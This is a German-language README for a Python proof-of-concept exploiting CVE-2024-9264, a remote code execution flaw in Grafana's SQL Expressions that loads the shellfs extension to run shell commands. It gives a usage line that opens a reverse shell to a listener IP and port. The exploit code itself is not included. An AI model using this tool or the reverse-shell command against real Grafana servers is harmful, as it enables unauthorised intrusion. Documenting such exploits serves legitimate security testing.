
Python-PoC für Remote-Code-Ausführung in Grafana über SQL-Ausdrücke, die unzureichende Eingabebereinigung ausnutzt, um beliebige Shell-Befehle auf authentifizierten Zielsystemen auszuführen.
Proof of Concept für Remote Code Execution in Grafana (CVE-2024-9264)
Dieses Repository enthält ein Python-Skript, das eine Remote Code Execution (RCE)-Sicherheitslücke in Grafanas SQL Expressions-Funktion ausnutzt. Durch unzureichende Eingabebereinigung ermöglicht dieser Exploit einem Angreifer, beliebige Shell-Befehle auf dem Server auszuführen. Dies wird durch die Community-Erweiterung shellfs ermöglicht, die von einem Angreifer installiert und geladen werden kann, um die Befehlsausführung zu erleichtern.
Viewer-Berechtigungen oder höherGrafana >= v11.0.0 (alle v11.x.y sind betroffen)
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001
Dieses Skript ist für Bildungszwecke und zur Verwendung in kontrollierten Umgebungen gedacht, in denen Sie die Berechtigung haben, die Sicherheit des Systems zu testen. Missbrauch dieses Tools kann zu rechtlichen Konsequenzen führen.